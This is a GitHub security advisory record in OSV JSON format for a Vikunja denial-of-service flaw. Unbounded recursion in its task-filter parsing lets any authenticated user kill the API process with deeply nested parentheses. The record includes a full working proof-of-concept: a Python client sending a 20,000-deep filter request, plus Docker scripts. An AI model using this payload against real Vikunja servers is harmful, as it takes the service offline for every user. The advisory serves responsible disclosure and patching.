{"id":"GHSA-xxc3-xpmc-vmvr","summary":"Vikunja: Unbounded nested task-filter recursion permits API process termination","details":"# Unbounded nested task-filter recursion permits API process termination\n\n## Summary\n\nAuthenticated task-list routes accept a filter expression without a length or nesting-depth bound, preprocess it, parse it recursively through fexpr, and recursively convert the resulting expression tree. A syntactically valid deeply nested expression well below the HTTP request-size ceiling exhausts memory and kills the API process.\n\n## Impact and affected scope\n\n- **Type:** Resource Exhaustion Recursive Parser\n- **Affected component:** GET /api/v2/projects/{project}/tasks?filter=\u003cnested expression\u003e; Other authenticated task-collection entrypoints that share getTaskFiltersFromFilterString\n- **Preconditions:** A low-privileged authenticated user supplies thousands of balanced parentheses around a valid task predicate in the filter query parameter.\n- **Verified revision:** `349cd5adbcc831ef08b08e6c9c6d627603c39606` on 28 August 2026\n- **Affected release range:** `= 2.5.0`; broader historical range not established and maintainer confirmation requested\n\nA single low-privileged network request can terminate the API process and deny service to all users.\n\n## Technical details\n\nThe server preprocesses and recursively parses/traverses an unbounded filter expression without rejecting excessive length or depth.\n\nAttack path: Authenticate, request an accessible project's task collection with 20,000 nested parenthesis pairs around id = 1, and drive parser and expression-tree memory growth until the process is killed.\n\nRelevant code:\n\n- `pkg/models/task_collection_filter.go:240`\n- `pkg/models/task_collection_filter.go:268`\n- `pkg/models/task_collection_filter.go:274`\n- `pkg/models/task_collection_filter.go:276`\n- `pkg/models/task_collection_filter.go:295`\n\n## Reproduction\n\nRun this only against an authorized disposable environment. The complete verified minimum file set is reproduced below. It starts the isolated target, runs the security-relevant trigger, verifies an objective target/application signal, and exercises the available negative or sibling control.\n\nCreate `reproduction/Dockerfile`:\n\n```text\nFROM golang:1.27.0-alpine\n\nRUN apk add --no-cache bash build-base ca-certificates python3 tzdata\n\nWORKDIR /app\nCOPY . /app\nRUN chmod +x /app/*.sh 2\u003e/dev/null || true\n\n# Target source is supplied only at runtime through /target-repo:ro.\n# This image contains build dependencies and reproduction helpers, not a clone.\n\n```\n\nCreate `reproduction/client.py`:\n\n```python\n#!/usr/bin/env python3\nimport json\nimport sys\nimport time\nimport urllib.error\nimport urllib.parse\nimport urllib.request\n\n\nBASE = \"http://target:3456\"\n\n\ndef request(method, path, body=None, token=None, expected=None, timeout=30):\n    raw = None if body is None else json.dumps(body).encode()\n    headers = {\"Accept\": \"application/json\"}\n    if body is not None:\n        headers[\"Content-Type\"] = \"application/json\"\n    if token:\n        headers[\"Authorization\"] = \"Bearer \" + token\n    req = urllib.request.Request(BASE + path, data=raw, headers=headers, method=method)\n    try:\n        with urllib.request.urlopen(req, timeout=timeout) as response:\n            status, data = response.status, response.read()\n    except urllib.error.HTTPError as exc:\n        status, data = exc.code, exc.read()\n    print(f\"{method} {path[:160]} -\u003e {status} {data[:200].decode(errors='replace')}\", flush=True)\n    if expected is not None and status != expected:\n        raise RuntimeError(f\"{method}: got {status}, expected {expected}\")\n    return status, json.loads(data.decode()) if data else {}\n\n\ndef wait_ready():\n    for _ in range(240):\n        try:\n            if request(\"GET\", \"/api/v1/info\")[0] == 200:\n                return\n        except Exception:\n            pass\n        time.sleep(0.25)\n    raise RuntimeError(\"target did not become ready\")\n\n\ndef filter_path(project_id, depth):\n    expression = \"(\" * depth + \"id = 1\" + \")\" * depth\n    path = f\"/api/v2/projects/{project_id}/tasks?filter=\" + urllib.parse.quote(expression, safe=\"\")\n    print(f\"PoC_FILTER_REQUEST depth={depth} target_bytes={len(path)}\", flush=True)\n    return path\n\n\ndef main():\n    wait_ready()\n    username, password = \"PoC-filter-user\", \"PoC-password-123!\"\n    request(\"POST\", \"/api/v2/register\", {\n        \"username\": username,\n        \"email\": username + \"@example.invalid\",\n        \"password\": password,\n    }, expected=201)\n    _, login = request(\"POST\", \"/api/v2/login\", {\"username\": username, \"password\": password}, expected=200)\n    token = login[\"token\"]\n    _, project = request(\"PUT\", \"/api/v1/projects\", {\"title\": \"PoC filter project\"}, token, 201)\n\n    started = time.monotonic()\n    request(\"GET\", filter_path(project[\"id\"], 1000), token=token, expected=200)\n    print(f\"PoC_FILTER_CONTROL=PASS elapsed={time.monotonic() - started:.3f}s\", flush=True)\n\n    try:\n        status, _ = request(\"GET\", filter_path(project[\"id\"], 20000), token=token, timeout=90)\n        raise RuntimeError(f\"attack unexpectedly returned HTTP {status}\")\n    except (TimeoutError, ConnectionError, urllib.error.URLError, OSError) as exc:\n        print(f\"PoC_FILTER_ATTACK_DISCONNECTED error={type(exc).__name__}\", flush=True)\n    print(\"PoC_FILTER_ATTACK_SENT depth=20000\", flush=True)\n\n\nif __name__ == \"__main__\":\n    try:\n        main()\n    except Exception as exc:\n        print(f\"PoC_FILTER_CLIENT=FAIL {exc}\", file=sys.stderr, flush=True)\n        raise\n\n```\n\nCreate `reproduction/prepare.sh`:\n\n```sh\n#!/usr/bin/env bash\nset -euo pipefail\n\nmkdir -p /work/repo\ncp -a /target-repo/. /work/repo/\nmkdir -p /work/repo/frontend/dist\ncp /app/frontend-placeholder.html /work/repo/frontend/dist/index.html\n\ncd /work/repo\nCGO_ENABLED=1 go build \\\n  -tags osusergo \\\n  -ldflags '-s -w -X code.vikunja.io/api/pkg/version.Version=PoC-reproduction' \\\n  -o /output/vikunja .\nchmod 0755 /output/vikunja\n\nif [[ -f /app/probe.go ]]; then\n  go build -o /output/probe /app/probe.go\n  chmod 0755 /output/probe\nfi\n\n```\n\nCreate `reproduction/run.sh`:\n\n```sh\n#!/usr/bin/env bash\nset -euo pipefail\n\nSCRIPT_DIR=\"$(cd \"$(dirname \"${BASH_SOURCE[0]}\")\" && pwd)\"\nFINDING_DIR=\"$(cd \"${SCRIPT_DIR}/..\" && pwd)\"\nSESSION_DIR=\"$(cd \"${FINDING_DIR}/..\" && pwd)\"\nCASE_ID=\"$(basename \"${SESSION_DIR}\")\"\nFINDING_NAME=\"$(basename \"${FINDING_DIR}\")\"\nIMAGE_TAG=\"PoC-${CASE_ID}-${FINDING_NAME}\"\nTARGET_REPO_URL=\"https://github.com/go-vikunja/vikunja.git\"\nTARGET_REF=\"349cd5adbcc831ef08b08e6c9c6d627603c39606\"\nWORKDIR=\"$(mktemp -d \"${SESSION_DIR}/.PoC-reproduction.XXXXXX\")\"\nTARGET_REPO_DIR=\"${WORKDIR}/repo\"\nBUILD_DIR=\"${WORKDIR}/build\"\nDATA_DIR=\"${WORKDIR}/data\"\nNETWORK=\"${IMAGE_TAG}-net-$$\"\nTARGET_CONTAINER=\"${IMAGE_TAG}-target-$$\"\n\ncleanup() {\n  docker rm -f \"${TARGET_CONTAINER}\" \u003e/dev/null 2\u003e&1 || true\n  docker network rm \"${NETWORK}\" \u003e/dev/null 2\u003e&1 || true\n  rm -rf \"${WORKDIR}\"\n}\ntrap cleanup EXIT\n\nmkdir -p \"${BUILD_DIR}\" \"${DATA_DIR}/files\"\nchmod 0777 \"${BUILD_DIR}\" \"${DATA_DIR}\" \"${DATA_DIR}/files\"\necho \"[PoC] cloning and pinning target ${TARGET_REF}\"\ngit clone --filter=blob:none --no-checkout \"${TARGET_REPO_URL}\" \"${TARGET_REPO_DIR}\"\ngit -C \"${TARGET_REPO_DIR}\" checkout --detach \"${TARGET_REF}\"\necho \"[PoC] building helper image ${IMAGE_TAG}\"\ndocker build -t \"${IMAGE_TAG}\" \"${SCRIPT_DIR}\"\ndocker run --rm -v \"${TARGET_REPO_DIR}:/target-repo:ro\" -v \"${BUILD_DIR}:/output\" \"${IMAGE_TAG}\" /app/prepare.sh\ndocker network create \"${NETWORK}\" \u003e/dev/null\ndocker run --detach --name \"${TARGET_CONTAINER}\" \\\n  --network \"${NETWORK}\" --network-alias target \\\n  --memory 512m --memory-swap 512m --pids-limit 256 \\\n  -v \"${BUILD_DIR}/vikunja:/app/vikunja:ro\" --tmpfs /data:rw,exec,mode=1777 \\\n  -e VIKUNJA_SERVICE_INTERFACE=:3456 -e VIKUNJA_SERVICE_PUBLICURL=http://target:3456/ \\\n  -e VIKUNJA_SERVICE_ROOTPATH=/data -e VIKUNJA_SERVICE_JWTSECRET=PoC-reproduction-secret \\\n  -e VIKUNJA_SERVICE_ENABLEREGISTRATION=true -e VIKUNJA_DATABASE_TYPE=sqlite \\\n  -e VIKUNJA_DATABASE_PATH=/data/vikunja.db -e VIKUNJA_FILES_BASEPATH=/data/files \\\n  -e VIKUNJA_MAILER_ENABLED=false -e VIKUNJA_REDIS_ENABLED=false -e VIKUNJA_LOG_HTTP=off \\\n  -e VIKUNJA_RATELIMIT_NOAUTHLIMIT=1000 \\\n  \"${IMAGE_TAG}\" /app/vikunja web \u003e/dev/null\n\nset +e\nOUTPUT=\"$(docker run --rm --network \"${NETWORK}\" \"${IMAGE_TAG}\" python3 /app/client.py 2\u003e&1)\"\nCLIENT_STATUS=$?\nset -e\nprintf '%s\\n' \"${OUTPUT}\"\nfor _ in $(seq 1 80); do\n  STATE=\"$(docker inspect --format '{{.State.OOMKilled}} {{.State.ExitCode}} {{.State.Running}}' \"${TARGET_CONTAINER}\")\"\n  [[ \"${STATE}\" != \"false 0 true\" ]] && break\n  sleep 0.25\ndone\nSTATE=\"$(docker inspect --format '{{.State.OOMKilled}} {{.State.ExitCode}} {{.State.Running}}' \"${TARGET_CONTAINER}\")\"\necho \"PoC_FILTER_CONTAINER state=${STATE} client_status=${CLIENT_STATUS}\"\nif ! grep -q 'PoC_FILTER_CONTROL=PASS' \u003c\u003c\u003c\"${OUTPUT}\" || ! grep -q 'PoC_FILTER_ATTACK_SENT depth=20000' \u003c\u003c\u003c\"${OUTPUT}\" || [[ \"${STATE}\" != \"true 137 false\" ]]; then\n  echo \"[PoC] FAIL: nested filter did not produce the expected cgroup OOM termination\" \u003e&2\n  exit 1\nfi\necho \"PoC_FILTER_RECURSION=PASS depth=20000 OOMKilled=true ExitCode=137\"\necho \"[PoC] SUCCESS: an approximately 120 KB authenticated request terminated a 512 MiB API process\"\n\n```\n\nCreate `reproduction/frontend-placeholder.html`:\n\n```html\n\u003c!doctype html\u003e\u003ctitle\u003ePoC backend reproduction placeholder\u003c/title\u003e\n\n```\n\nFrom the directory containing these files, run:\n\n```sh\nchmod +x reproduction/run.sh reproduction/*.sh 2\u003e/dev/null || true\n./reproduction/run.sh\n```\n\n**Expected:** A low-privileged request below the server request-size ceiling terminates the API process through unbounded filter parsing.\n\n**Observed:** Depth 1,000 returned HTTP 200 in 14 ms. The 120,044-byte depth-20,000 request disconnected, and Docker recorded OOMKilled=true, ExitCode=137. The run emitted PoC_FILTER_RECURSION=PASS.\n\n**Verification and controls:** The client creates an ordinary account and project, asserts the depth-1,000 route control is HTTP 200, submits depth 20,000, and the host script accepts only the attack marker plus Docker OOMKilled=true and ExitCode=137.\n\nObserved evidence:\n\n- depth=1000 target_bytes=6044: HTTP 200\n- depth=20000 target_bytes=120044: RemoteDisconnected\n- target container: OOMKilled=true, ExitCode=137\n- PoC_FILTER_RECURSION=PASS\n\n## Suggested remediation\n\nEnforce the intended authorization, size, cardinality, recursion, or lifecycle boundary before the sensitive operation described above; fail closed; release partial resources on every exit path; and add a regression test that preserves the exploit and negative-control oracles.\n\n## Severity\n\n**CVSS v4.0: 7.1 (High)** — Vector: `CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N`\n\nThis assessment is preliminary and pending maintainer confirmation. The score was recalculated with the FIRST CVSS v4.0 reference implementation on 28 August 2026.\n\n## Disclosure context and attribution\n\nAI-assisted analysis helped surface this issue; the behavior was independently reproduced and validated in an isolated environment.\n\nReported by the University of Sydney security research team:\n\n- [Ziyue Wang (@Zyy0530)](https://github.com/Zyy0530)\n- [Liyi Zhou (@lzhou1110)](https://github.com/lzhou1110)\n- [Strick Sheng (@Str1ckl4nd)](https://github.com/Str1ckl4nd)\n- [Maurice Ng (@mauriceng98)](https://github.com/mauriceng98)\n- [Chenchen Yu (@7thParkk)](https://github.com/7thParkk)\n\nWe are happy to answer questions, provide additional verification details, or validate a candidate patch.","aliases":["CVE-2026-91968"],"modified":"2026-10-09T21:00:16.212127033Z","published":"2026-10-09T20:53:03Z","database_specific":{"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2026-10-09T20:53:03Z","nvd_published_at":null,"cwe_ids":["CWE-674"]},"references":[{"type":"WEB","url":"https://github.com/go-vikunja/vikunja/security/advisories/GHSA-xxc3-xpmc-vmvr"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-91968"},{"type":"WEB","url":"https://github.com/go-vikunja/vikunja/pull/3688"},{"type":"PACKAGE","url":"https://github.com/go-vikunja/vikunja"},{"type":"WEB","url":"https://github.com/go-vikunja/vikunja/releases/tag/v2.6.0"},{"type":"WEB","url":"https://www.vulncheck.com/advisories/vikunja-before-2.6.0-denial-of-service-via-unbounded-filter-recursion"}],"affected":[{"package":{"name":"code.vikunja.io/api","ecosystem":"Go","purl":"pkg:golang/code.vikunja.io/api"},"ranges":[{"type":"SEMVER","events":[{"introduced":"2.5.0"},{"fixed":"2.6.0"}]}],"versions":["2.5.0"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/10/GHSA-xxc3-xpmc-vmvr/GHSA-xxc3-xpmc-vmvr.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"}]}